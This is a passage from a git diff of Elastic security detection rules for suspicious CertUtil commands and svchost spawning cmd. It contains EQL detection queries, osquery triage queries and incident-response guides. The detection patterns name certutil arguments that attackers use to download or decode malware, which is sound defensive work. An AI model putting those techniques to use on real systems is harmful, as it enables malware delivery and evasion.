Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json index 4d56cb36851..8327819c057 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json index 158a027580b..80f100fe3a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json index 9828ceb6e49..13e4d305bcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json index 7f5f627b15b..07dfa1fd194 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 